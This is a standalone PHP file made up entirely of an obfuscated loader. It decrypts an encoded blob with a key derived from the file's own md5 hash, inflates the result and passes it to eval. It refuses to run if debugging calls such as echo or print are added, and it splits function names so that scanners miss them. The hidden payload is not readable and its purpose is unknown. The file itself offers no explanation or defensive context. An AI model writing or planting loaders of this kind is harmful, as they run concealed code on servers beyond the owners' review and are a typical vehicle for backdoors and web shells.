<?php
$rlfnvscfp="90c60f1b1b4cc1ebdc04eae2c946bbda";
$sbksponp="0d515607030300060100525653085d51565606075d5151535200515452565100";
$otkbzwiql="SfNoW/BVPaOfQCqUHk2dHlEak0jjwzJacWgH8ypY/tKpF96MRedsCHqwJDL5+TehzuaxzMoclEbp+plHJxgYr0NRBrj95IqERtmIN72KOdzOPg+P5DMjDSOie7vENbr+ibLsLV5zdtlWIgHd16IK93bn+fCpDTEN+TpX3pF3VsSH/X2XELk7ujl6VIAgVu8G6DGkYZkwcz0zR9F0Ei+nLXv5lcRR+N9Odi5OUBLe+hNuuBFHXCOb9X1h3iHlblKT91IvAusf502DNtsZlC9Hgn7QRlUOAe37xWzUx+q4RLMGsSDdpvnRAKoSozOxHoDZSpYw5h+AVlxYzNE8mz0V0zlEXoRO+RNmoXsauBnYr22+dYRZ6ZilGPUjHhyU7peam+WZi31TJ69xlblQgcI9";
$uieacwozcl=file_get_contents(__FILE__);
$hhfkse=str_replace($otkbzwiql,"",$uieacwozcl);
if(strpos($hhfkse,"ec"."ho")!==false||strpos($hhfkse,"pr"."int")!==false||strpos($hhfkse,"var_"."dump")!==false||strpos($hhfkse,"file_put_"."contents")!==false||strpos($hhfkse,"fw"."rite")!==false){die();}
$mpngrlc=str_replace(array($rlfnvscfp,$sbksponp),array("SP_caf34a34","KP_4ca5a838"),$uieacwozcl);
$dniuipkuj=md5($mpngrlc);
$zfinxdqgemvt=hex2bin($sbksponp);
$nfpjrs="";
$thvqkigfjqbb=strlen($dniuipkuj);
for($qmwysknj=0;$qmwysknj<$thvqkigfjqbb;$qmwysknj++){
    $nfpjrs.=chr(ord($zfinxdqgemvt[$qmwysknj])^ord($dniuipkuj[$qmwysknj]));
}
$pzbwot=base64_decode($otkbzwiql);
$mpmpwx=strlen($pzbwot);
$ormwnlngqwll="";
$nahgnznfxpf=strlen($nfpjrs);
for($qmwysknj=0;$qmwysknj<$mpmpwx;$qmwysknj++){
    $ormwnlngqwll.=$pzbwot[$qmwysknj]^$nfpjrs[$qmwysknj%$nahgnznfxpf];
}
$cpftbbj="gz"."in"."fl"."ate";
eval($cpftbbj($ormwnlngqwll));
